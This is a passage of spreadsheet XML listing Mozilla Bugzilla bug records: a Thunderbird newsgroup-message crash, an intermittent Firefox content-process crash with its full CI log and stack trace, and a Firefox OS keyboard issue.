          <t>Core</t>
        </is>
      </c>
      <c r="J6362" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K6362" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6362" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6362" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6362" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6362" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6362" t="inlineStr">
        <is>
          <t>[necko-triaged][tbird crash][adv-main123+][adv-esr115.8+]</t>
        </is>
      </c>
      <c r="Q6362" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6362" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6362" t="inlineStr">
        <is>
          <t>124 Branch</t>
        </is>
      </c>
      <c r="T6362" t="n">
        <v>1</v>
      </c>
      <c r="U6362" t="n">
        <v>0</v>
      </c>
      <c r="V6362" t="n">
        <v>36</v>
      </c>
      <c r="W6362" t="inlineStr">
        <is>
          <t>Try to read Message-ID: &lt;nnd$54637960$0da2d9c3@3f2ba0a65bb508bb&gt;
| Subject: This is a test [1/1] "test.jpg" yEnc (2/2)
| Newsgroups: misc.test
| Date: Mon, 10 Jul 2023 06:44:56 +0200
Result with TB117.0a1:
&lt;https://crash-stats.mozilla.org/report/index/b5064a44-4821-46e4-bc3c-320ab0230716&gt;
TB102.13.0 crashes as well.</t>
        </is>
      </c>
      <c r="X6362" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6363">
      <c r="A6363" t="n">
        <v>1580565</v>
      </c>
      <c r="B6363" t="inlineStr">
        <is>
          <t>2019-09-11 11:30:27 -0700</t>
        </is>
      </c>
      <c r="C6363" t="inlineStr">
        <is>
          <t>Intermittent PROCESS-CRASH | Main app process exited normally | application crashed [@ mozilla::dom::BrowsingContext::CreateFromIPC(mozilla::dom::BrowsingContext::IPCInitializer&amp;&amp;, mozilla::dom::BrowsingContextGroup*, mozilla::dom::ContentParent*)]</t>
        </is>
      </c>
      <c r="D6363" t="inlineStr">
        <is>
          <t>2022-01-10 05:28:51 -0800</t>
        </is>
      </c>
      <c r="E6363" t="n">
        <v>1</v>
      </c>
      <c r="F6363" t="n">
        <v>1</v>
      </c>
      <c r="G6363" t="n">
        <v>3</v>
      </c>
      <c r="H6363" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6363" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6363" t="inlineStr">
        <is>
          <t>DOM: Content Processes</t>
        </is>
      </c>
      <c r="K6363" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6363" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6363" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6363" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6363" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6363" t="inlineStr">
        <is>
          <t>[stockwell disabled][stockwell needswork:owner]</t>
        </is>
      </c>
      <c r="Q6363" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6363" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6363" t="inlineStr">
        <is>
          <t>mozilla77</t>
        </is>
      </c>
      <c r="T6363" t="n">
        <v>1</v>
      </c>
      <c r="U6363" t="n">
        <v>0</v>
      </c>
      <c r="V6363" t="n">
        <v>119</v>
      </c>
      <c r="W6363" t="inlineStr">
        <is>
          <t>**Filed by:** cbrindusan [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer.html#?job_id=266150055&amp;repo=mozilla-central
**Full log:** https://queue.taskcluster.net/v1/task/MbAFs7_OQuGgQ4jqJOPuuw/runs/0/artifacts/public/logs/live_backing.log
---
[task 2019-09-11T16:56:28.880Z] 16:56:28     INFO - TEST-START | toolkit/components/url-classifier/tests/mochitest/test_classify_by_default.html
[task 2019-09-11T16:56:29.360Z] 16:56:29     INFO - GECKO(9028) | JavaScript error: , line 0: TypeError: NetworkError when attempting to fetch resource.
[task 2019-09-11T16:56:29.424Z] 16:56:29     INFO - GECKO(9028) | JavaScript error: resource:///actors/PageStyleChild.jsm, line 35: SecurityError: Permission denied to access property "document" on cross-origin object
[task 2019-09-11T16:56:29.854Z] 16:56:29     INFO - GECKO(9028) | [Parent 9028, Gecko_IOThread] WARNING: pipe error (170): Connection reset by peer: file /builds/worker/workspace/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 358
[task 2019-09-11T16:56:29.902Z] 16:56:29     INFO - GECKO(9028) | JavaScript error: resource:///actors/PageStyleChild.jsm, line 35: SecurityError: Permission denied to access property "document" on cross-origin object
[task 2019-09-11T16:56:29.902Z] 16:56:29     INFO - GECKO(9028) | JavaScript error: , line 0: TypeError: NetworkError when attempting to fetch resource.
[task 2019-09-11T16:56:30.040Z] 16:56:30    ERROR - GECKO(9028) | A content process crashed and MOZ_CRASHREPORTER_SHUTDOWN is set, shutting down
[task 2019-09-11T16:56:30.247Z] 16:56:30     INFO - GECKO(9028) | [Child 9211, Chrome_ChildThread] WARNING: pipe error (3): Connection reset by peer: file /builds/worker/workspace/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 358
[task 2019-09-11T16:56:30.268Z] 16:56:30     INFO - GECKO(9028) | [Parent 9028, Gecko_IOThread] WARNING: pipe error (151): Connection reset by peer: file /builds/worker/workspace/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 358
[task 2019-09-11T16:56:30.410Z] 16:56:30     INFO - GECKO(9028) | 1568220990408	Marionette	TRACE	Received observer notification xpcom-will-shutdown
[task 2019-09-11T16:56:30.410Z] 16:56:30     INFO - GECKO(9028) | 1568220990408	Marionette	INFO	Stopped listening on port 2828
[task 2019-09-11T16:56:30.410Z] 16:56:30     INFO - GECKO(9028) | 1568220990408	Marionette	DEBUG	Remote service is inactive
[task 2019-09-11T16:56:30.446Z] 16:56:30     INFO - GECKO(9028) | ###!!! [Child][RunMessage] Error: Channel closing: too late to send/recv, messages will be lost
[task 2019-09-11T16:56:30.755Z] 16:56:30     INFO - TEST-INFO | Main app process: exit 0
[task 2019-09-11T16:56:30.755Z] 16:56:30     INFO - runtests.py | Application ran for: 0:00:14.468064
[task 2019-09-11T16:56:30.755Z] 16:56:30     INFO - zombiecheck | Reading PID log: /tmp/tmpknOMkdpidlog
[task 2019-09-11T16:56:30.755Z] 16:56:30     INFO - ==&gt; process 9028 launched child process 9049
[task 2019-09-11T16:56:30.755Z] 16:56:30     INFO - ==&gt; process 9028 launched child process 9065
[task 2019-09-11T16:56:30.755Z] 16:56:30     INFO - ==&gt; process 9028 launched child process 9101
[task 2019-09-11T16:56:30.755Z] 16:56:30     INFO - ==&gt; process 9028 launched child process 9119
[task 2019-09-11T16:56:30.756Z] 16:56:30     INFO - ==&gt; process 9028 launched child process 9166
[task 2019-09-11T16:56:30.757Z] 16:56:30     INFO - ==&gt; process 9028 launched child process 9211
[task 2019-09-11T16:56:30.757Z] 16:56:30     INFO - ==&gt; process 9028 launched child process 9255
[task 2019-09-11T16:56:30.758Z] 16:56:30     INFO - ==&gt; process 9028 launched child process 9289
[task 2019-09-11T16:56:30.758Z] 16:56:30     INFO - ==&gt; process 9028 launched child process 9313
[task 2019-09-11T16:56:30.759Z] 16:56:30     INFO - ==&gt; process 9028 launched child process 9335
[task 2019-09-11T16:56:30.759Z] 16:56:30     INFO - zombiecheck | Checking for orphan process with PID: 9313
[task 2019-09-11T16:56:30.760Z] 16:56:30     INFO - zombiecheck | Checking for orphan process with PID: 9255
[task 2019-09-11T16:56:30.760Z] 16:56:30     INFO - zombiecheck | Checking for orphan process with PID: 9065
[task 2019-09-11T16:56:30.760Z] 16:56:30     INFO - zombiecheck | Checking for orphan process with PID: 9335
[task 2019-09-11T16:56:30.761Z] 16:56:30     INFO - zombiecheck | Checking for orphan process with PID: 9101
[task 2019-09-11T16:56:30.761Z] 16:56:30     INFO - zombiecheck | Checking for orphan process with PID: 9166
[task 2019-09-11T16:56:30.762Z] 16:56:30     INFO - zombiecheck | Checking for orphan process with PID: 9289
[task 2019-09-11T16:56:30.763Z] 16:56:30     INFO - zombiecheck | Checking for orphan process with PID: 9049
[task 2019-09-11T16:56:30.763Z] 16:56:30     INFO - zombiecheck | Checking for orphan process with PID: 9211
[task 2019-09-11T16:56:30.764Z] 16:56:30     INFO - zombiecheck | Checking for orphan process with PID: 9119
[task 2019-09-11T16:56:30.764Z] 16:56:30     INFO - mozcrash Downloading symbols from: https://queue.taskcluster.net/v1/task/eNMKh5s1QF2-Uv43HyN1oA/artifacts/public/build/target.crashreporter-symbols.zip
[task 2019-09-11T16:56:34.217Z] 16:56:34     INFO - mozcrash Copy/paste: /builds/worker/workspace/build/linux64-minidump_stackwalk /tmp/tmpprgnFY.mozrunner/minidumps/73e60e15-f669-1a7c-c23b-9631610b584e.dmp /tmp/tmp5KCyGX
[task 2019-09-11T16:56:37.534Z] 16:56:37     INFO - mozcrash Saved minidump as /builds/worker/workspace/build/blobber_upload_dir/73e60e15-f669-1a7c-c23b-9631610b584e.dmp
[task 2019-09-11T16:56:37.534Z] 16:56:37     INFO - mozcrash Saved app info as /builds/worker/workspace/build/blobber_upload_dir/73e60e15-f669-1a7c-c23b-9631610b584e.extra
[task 2019-09-11T16:56:37.592Z] 16:56:37     INFO - PROCESS-CRASH | Main app process exited normally | application crashed [@ mozilla::dom::BrowsingContext::CreateFromIPC(mozilla::dom::BrowsingContext::IPCInitializer&amp;&amp;, mozilla::dom::BrowsingContextGroup*, mozilla::dom::ContentParent*)]
[task 2019-09-11T16:56:37.592Z] 16:56:37     INFO - Crash dump filename: /tmp/tmpprgnFY.mozrunner/minidumps/73e60e15-f669-1a7c-c23b-9631610b584e.dmp
[task 2019-09-11T16:56:37.592Z] 16:56:37     INFO - Operating system: Linux
[task 2019-09-11T16:56:37.592Z] 16:56:37     INFO -                   0.0.0 Linux 4.4.0-1014-aws #14taskcluster1-Ubuntu SMP Tue Apr 3 10:27:00 UTC 2018 x86_64
[task 2019-09-11T16:56:37.592Z] 16:56:37     INFO - CPU: amd64
[task 2019-09-11T16:56:37.592Z] 16:56:37     INFO -      family 6 model 85 stepping 4
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO -      1 CPU[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO - 
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO - GPU: UNKNOWN
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO - 
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO - Crash reason:  SIGSEGV /SEGV_MAPERR
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO - Crash address: 0x0
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO - Process uptime: not available
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO - 
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO - Thread 0 (crashed)
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO -  0  libxul.so!mozilla::dom::BrowsingContext::CreateFromIPC(mozilla::dom::BrowsingContext::IPCInitializer&amp;&amp;, mozilla::dom::BrowsingContextGroup*, mozilla::dom::ContentParent*) [BrowsingContext.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 163 + 0x11]
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO -     rax = 0x00007f40409c1494   rdx = 0x0000000081af1548
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO -     rcx = 0x00005621ae08ac40   rbx = 0x0000000000000000
[task 2019-09-11T16:56:37.593Z] 16:56:37     INFO -     rsi = 0x00007f4034444420   rdi = 0x0000000000000008
[task 2019-09-11T16:56:37.594Z] 16:56:37     INFO -     rbp = 0x00007ffd0bec4a30   rsp = 0x00007ffd0bec49f0
[task 2019-09-11T16:56:37.594Z] 16:56:37     INFO -      r8 = 0x0000000000000003    r9 = 0x00007f4034444440
[task 2019-09-11T16:56:37.594Z] 16:56:37     INFO -     r10 = 0x000000000007ff10   r11 = 0x000000000000001d
[task 2019-09-11T16:56:37.594Z] 16:56:37     INFO -     r12 = 0x00007f40347e05e0   r13 = 0x0000000000000000
[task 2019-09-11T16:56:37.594Z] 16:56:37     INFO -     r14 = 0x0000000000000138   r15 = 0x00007f404ba62718
[task 2019-09-11T16:56:37.594Z] 16:56:37     INFO -     rip = 0x00007f403e3adb8a
[task 2019-09-11T16:56:37.594Z] 16:56:37     INFO -     Found by: given as instruction pointer in context
[task 2019-09-11T16:56:37.595Z] 16:56:37     INFO -  1  libxul.so!mozilla::dom::ContentChild::RecvRegisterBrowsingContextGroup(nsTArray&lt;mozilla::dom::BrowsingContext::IPCInitializer&gt;&amp;&amp;) [ContentChild.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 3885 + 0xa]
[task 2019-09-11T16:56:37.595Z] 16:56:37     INFO -     rbx = 0x00007f40347e05e0   rbp = 0x00007ffd0bec4a80
[task 2019-09-11T16:56:37.595Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec4a40   r12 = 0x0000000000000001
[task 2019-09-11T16:56:37.596Z] 16:56:37     INFO -     r13 = 0x0000000000000004   r14 = 0x0000000000000138
[task 2019-09-11T16:56:37.596Z] 16:56:37     INFO -     r15 = 0x0000000000000128   rip = 0x00007f403d2e03f2
[task 2019-09-11T16:56:37.596Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.597Z] 16:56:37     INFO -  2  libxul.so!mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) [PContentChild.cpp: : 12063 + 0x8]
[task 2019-09-11T16:56:37.597Z] 16:56:37     INFO -     rbx = 0x00007f40347103f0   rbp = 0x00007ffd0bec5980
[task 2019-09-11T16:56:37.597Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec4a90   r12 = 0x00007f40347103e8
[task 2019-09-11T16:56:37.597Z] 16:56:37     INFO -     r13 = 0x0000000000000000   r14 = 0x00007ffd0bec4b10
[task 2019-09-11T16:56:37.598Z] 16:56:37     INFO -     r15 = 0x00007f404bada020   rip = 0x00007f403b60f782
[task 2019-09-11T16:56:37.598Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.598Z] 16:56:37     INFO -  3  libxul.so!mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) [MessageChannel.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 2185 + 0xd]
[task 2019-09-11T16:56:37.599Z] 16:56:37     INFO -     rbx = 0x00007f404bada120   rbp = 0x00007ffd0bec59c0
[task 2019-09-11T16:56:37.599Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec5990   r12 = 0x0000000000000001
[task 2019-09-11T16:56:37.599Z] 16:56:37     INFO -     r13 = 0x0000000000000000   r14 = 0x00007f40347103e8
[task 2019-09-11T16:56:37.599Z] 16:56:37     INFO -     r15 = 0x00007f403543f520   rip = 0x00007f403b56e887
[task 2019-09-11T16:56:37.600Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.600Z] 16:56:37     INFO -  4  libxul.so!mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) [MessageChannel.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 2109 + 0x5]
[task 2019-09-11T16:56:37.600Z] 16:56:37     INFO -     rbx = 0x00007f4035444120   rbp = 0x00007ffd0bec5a80
[task 2019-09-11T16:56:37.600Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec59d0   r12 = 0x00007f404bada120
[task 2019-09-11T16:56:37.601Z] 16:56:37     INFO -     r13 = 0x0000000000000000   r14 = 0x00007f40347103e8
[task 2019-09-11T16:56:37.601Z] 16:56:37     INFO -     r15 = 0x00000000ffffffff   rip = 0x00007f403b56d78e
[task 2019-09-11T16:56:37.601Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.601Z] 16:56:37     INFO -  5  libxul.so!mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) [MessageChannel.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 1954 + 0xb]
[task 2019-09-11T16:56:37.602Z] 16:56:37     INFO -     rbx = 0x00007f404ba8b4c0   rbp = 0x00007ffd0bec5ad0
[task 2019-09-11T16:56:37.602Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec5a90   r12 = 0x00007f4034710390[task 2019-09-11T16:56:37.602Z] 16:56:37     INFO -     r13 = 0x0000000000000000   r14 = 0x00007f404bada120
[task 2019-09-11T16:56:37.603Z] 16:56:37     INFO -     r15 = 0x00007f40347103e8   rip = 0x00007f403b56dedf
[task 2019-09-11T16:56:37.603Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.603Z] 16:56:37     INFO -  6  libxul.so!mozilla::ipc::MessageChannel::MessageTask::Run() [MessageChannel.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 1985 + 0xc]
[task 2019-09-11T16:56:37.603Z] 16:56:37     INFO -     rbx = 0x00007f4034710390   rbp = 0x00007ffd0bec5af0
[task 2019-09-11T16:56:37.603Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec5ae0   r12 = 0x0000000000000001
[task 2019-09-11T16:56:37.604Z] 16:56:37     INFO -     r13 = 0x0000000000000000   r14 = 0x00007f4035444120
[task 2019-09-11T16:56:37.604Z] 16:56:37     INFO -     r15 = 0x00007f404ba6a9e0   rip = 0x00007f403b56e1ce
[task 2019-09-11T16:56:37.604Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.604Z] 16:56:37     INFO -  7  libxul.so!nsThread::ProcessNextEvent(bool, bool*) [nsThread.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 1225 + 0x6]
[task 2019-09-11T16:56:37.605Z] 16:56:37     INFO -     rbx = 0x0000000000000000   rbp = 0x00007ffd0bec5ff0
[task 2019-09-11T16:56:37.605Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec5b00   r12 = 0x0000000000000001
[task 2019-09-11T16:56:37.605Z] 16:56:37     INFO -     r13 = 0x0000000000000000   r14 = 0x00007ffd0bec600f
[task 2019-09-11T16:56:37.605Z] 16:56:37     INFO -     r15 = 0x00007f404ba6a9e0   rip = 0x00007f403b0727f2
[task 2019-09-11T16:56:37.606Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.606Z] 16:56:37     INFO -  8  libxul.so!NS_ProcessNextEvent(nsIThread*, bool) [nsThreadUtils.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 486 + 0xd]
[task 2019-09-11T16:56:37.606Z] 16:56:37     INFO -     rbx = 0x0000000000000000   rbp = 0x00007ffd0bec6020
[task 2019-09-11T16:56:37.606Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec6000   r12 = 0x00007f404ba9bc10
[task 2019-09-11T16:56:37.607Z] 16:56:37     INFO -     r13 = 0x00007f404ba9bbf0   r14 = 0x00007ffd0bec6158
[task 2019-09-11T16:56:37.607Z] 16:56:37     INFO -     r15 = 0x0000000000000001   rip = 0x00007f403b074608
[task 2019-09-11T16:56:37.607Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.607Z] 16:56:37     INFO -  9  libxul.so!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) [MessagePump.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 88 + 0x7]
[task 2019-09-11T16:56:37.608Z] 16:56:37     INFO -     rbx = 0x0000000000000001   rbp = 0x00007ffd0bec6060
[task 2019-09-11T16:56:37.608Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec6030   r12 = 0x00007f404ba9bc10
[task 2019-09-11T16:56:37.608Z] 16:56:37     INFO -     r13 = 0x00007f404ba9bbf0   r14 = 0x00007ffd0bec6158
[task 2019-09-11T16:56:37.608Z] 16:56:37     INFO -     r15 = 0x0000000000000001   rip = 0x00007f403b570a7a
[task 2019-09-11T16:56:37.609Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.609Z] 16:56:37     INFO - 10  libxul.so!MessageLoop::Run() [message_loop.cc:ba563f823a564dfade0327d003143d765ac9ab59 : 290 + 0xc]
[task 2019-09-11T16:56:37.609Z] 16:56:37     INFO -     rbx = 0x00007f4035441f40   rbp = 0x00007ffd0bec6090
[task 2019-09-11T16:56:37.609Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec6070   r12 = 0x00007ffd0bec74f8
[task 2019-09-11T16:56:37.609Z] 16:56:37     INFO -     r13 = 0x00000e4fb955adc8   r14 = 0x00007f404ba6a9e0
[task 2019-09-11T16:56:37.610Z] 16:56:37     INFO -     r15 = 0x0000000000002344   rip = 0x00007f403b5329a6
[task 2019-09-11T16:56:37.610Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.610Z] 16:56:37     INFO - 11  libxul.so!nsBaseAppShell::Run() [nsBaseAppShell.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 137 + 0xd]
[task 2019-09-11T16:56:37.610Z] 16:56:37     INFO -     rbx = 0x00007f4035441f40   rbp = 0x00007ffd0bec60b0
[task 2019-09-11T16:56:37.611Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec60a0   r12 = 0x00007ffd0bec74f8
[task 2019-09-11T16:56:37.611Z] 16:56:37     INFO -     r13 = 0x00000e4fb955adc8   r14 = 0x00007f404ba6a9e0
[task 2019-09-11T16:56:37.612Z] 16:56:37     INFO -     r15 = 0x0000000000002344   rip = 0x00007f403d5b4969
[task 2019-09-11T16:56:37.612Z] 16:56:37     INFO -     Found by: call frame info[task 2019-09-11T16:56:37.612Z] 16:56:37     INFO - 12  libxul.so!XRE_RunAppShell() [nsEmbedFunctions.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 934 + 0x6]
[task 2019-09-11T16:56:37.613Z] 16:56:37     INFO -     rbx = 0x00007f404bada000   rbp = 0x00007ffd0bec60e0
[task 2019-09-11T16:56:37.613Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec60c0   r12 = 0x00007ffd0bec74f8
[task 2019-09-11T16:56:37.613Z] 16:56:37     INFO -     r13 = 0x00000e4fb955adc8   r14 = 0x0000000080004005
[task 2019-09-11T16:56:37.614Z] 16:56:37     INFO -     r15 = 0x0000000000002344   rip = 0x00007f403e745264
[task 2019-09-11T16:56:37.614Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.615Z] 16:56:37     INFO - 13  libxul.so!MessageLoop::Run() [message_loop.cc:ba563f823a564dfade0327d003143d765ac9ab59 : 290 + 0xc]
[task 2019-09-11T16:56:37.615Z] 16:56:37     INFO -     rbx = 0x00007f404bada000   rbp = 0x00007ffd0bec6110
[task 2019-09-11T16:56:37.615Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec60f0   r12 = 0x00007ffd0bec74f8
[task 2019-09-11T16:56:37.616Z] 16:56:37     INFO -     r13 = 0x00000e4fb955adc8   r14 = 0x0000000080004005
[task 2019-09-11T16:56:37.616Z] 16:56:37     INFO -     r15 = 0x0000000000002344   rip = 0x00007f403b5329a6
[task 2019-09-11T16:56:37.616Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.616Z] 16:56:37     INFO - 14  libxul.so!XRE_InitChildProcess(int, char**, XREChildData const*) [nsEmbedFunctions.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 769 + 0x5]
[task 2019-09-11T16:56:37.617Z] 16:56:37     INFO -     rbx = 0x00007f404bada000   rbp = 0x00007ffd0bec63a0
[task 2019-09-11T16:56:37.617Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec6120   r12 = 0x00007ffd0bec74f8
[task 2019-09-11T16:56:37.617Z] 16:56:37     INFO -     r13 = 0x00000e4fb955adc8   r14 = 0x0000000080004005
[task 2019-09-11T16:56:37.617Z] 16:56:37     INFO -     r15 = 0x0000000000002344   rip = 0x00007f403e7450d4
[task 2019-09-11T16:56:37.618Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.618Z] 16:56:37     INFO - 15  firefox-bin!main [nsBrowserApp.cpp:ba563f823a564dfade0327d003143d765ac9ab59 : 272 + 0x32]
[task 2019-09-11T16:56:37.618Z] 16:56:37     INFO -     rbx = 0x00007f404ba02730   rbp = 0x00007ffd0bec7410
[task 2019-09-11T16:56:37.618Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec63b0   r12 = 0x00007ffd0bec74f8
[task 2019-09-11T16:56:37.618Z] 16:56:37     INFO -     r13 = 0x00000e4fb955adc8   r14 = 0x0000000000000013
[task 2019-09-11T16:56:37.619Z] 16:56:37     INFO -     r15 = 0x00007f404ba22040   rip = 0x00005621ae002fd3
[task 2019-09-11T16:56:37.619Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.619Z] 16:56:37     INFO - 16  libc-2.23.so!__libc_start_main [libc-start.c : 291 + 0x1a]
[task 2019-09-11T16:56:37.619Z] 16:56:37     INFO -     rbx = 0x0000000000000000   rbp = 0x00005621ae074180
[task 2019-09-11T16:56:37.620Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec7420   r12 = 0x00005621ae002bfc
[task 2019-09-11T16:56:37.620Z] 16:56:37     INFO -     r13 = 0x00007ffd0bec74f0   r14 = 0x0000000000000000
[task 2019-09-11T16:56:37.620Z] 16:56:37     INFO -     r15 = 0x0000000000000000   rip = 0x00007f404bc87830
[task 2019-09-11T16:56:37.621Z] 16:56:37     INFO -     Found by: call frame info
[task 2019-09-11T16:56:37.621Z] 16:56:37     INFO - 17  firefox-bin + 0xbde0
[task 2019-09-11T16:56:37.621Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec7440   rip = 0x00005621ae002de0
[task 2019-09-11T16:56:37.622Z] 16:56:37     INFO -     Found by: stack scanning
[task 2019-09-11T16:56:37.622Z] 16:56:37     INFO - 18  firefox-bin + 0xbbfc
[task 2019-09-11T16:56:37.622Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec7458   rip = 0x00005621ae002bfc
[task 2019-09-11T16:56:37.623Z] 16:56:37     INFO -     Found by: stack scanning
[task 2019-09-11T16:56:37.623Z] 16:56:37     INFO - 19  ld-2.23.so!_dl_init [dl-init.c : 30 + 0x16]
[task 2019-09-11T16:56:37.623Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec74b0   rip = 0x00007f404cf0b7db
[task 2019-09-11T16:56:37.624Z] 16:56:37     INFO -     Found by: stack scanning[task 2019-09-11T16:56:37.624Z] 16:56:37     INFO - 20  firefox-bin + 0xbbfc
[task 2019-09-11T16:56:37.624Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec74c8   rip = 0x00005621ae002bfc
[task 2019-09-11T16:56:37.625Z] 16:56:37     INFO -     Found by: stack scanning
[task 2019-09-11T16:56:37.625Z] 16:56:37     INFO - 21  firefox-bin!_start + 0x29
[task 2019-09-11T16:56:37.625Z] 16:56:37     INFO -     rsp = 0x00007ffd0bec74e0   rip = 0x00005621ae002c25
[task 2019-09-11T16:56:37.626Z] 16:56:37     INFO -     Found by: stack scanning</t>
        </is>
      </c>
      <c r="X6363" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6364">
      <c r="A6364" t="n">
        <v>809757</v>
      </c>
      <c r="B6364" t="inlineStr">
        <is>
          <t>2012-11-07 22:30:56 -0800</t>
        </is>
      </c>
      <c r="C6364" t="inlineStr">
        <is>
          <t>[Keyboard] No keyboard when trying to fill a field</t>
        </is>
      </c>
      <c r="D6364" t="inlineStr">
        <is>
          <t>2013-01-03 15:51:26 -0800</t>
        </is>
      </c>
      <c r="E6364" t="n">
        <v>1</v>
      </c>
      <c r="F6364" t="n">
        <v>1</v>
      </c>
      <c r="G6364" t="n">
        <v>6</v>
      </c>
      <c r="H6364" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6364" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6364" t="inlineStr">
        <is>
          <t>Gaia</t>
        </is>
      </c>
      <c r="K6364" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6364" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6364" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6364" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6364" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6364" t="inlineStr"/>
      <c r="Q6364" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6364" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6364" t="inlineStr">
        <is>
          <t>B2G C2 (20nov-10dec)</t>
        </is>
      </c>
      <c r="T6364" t="n">
        <v>1</v>
      </c>
      <c r="U6364" t="n">
        <v>0</v>
      </c>
      <c r="V6364" t="n">
        <v>22</v>
      </c>
      <c r="W6364" t="inlineStr">
        <is>
          <t>November 7 build
gecko-aurora: d782479f2838
gaia: a226cc9dea848eeeb87364b54fe7e472ae5a1366
The keyboard is very unstable, sometimes it doesn't appear when we need to fill a field.</t>
        </is>
      </c>
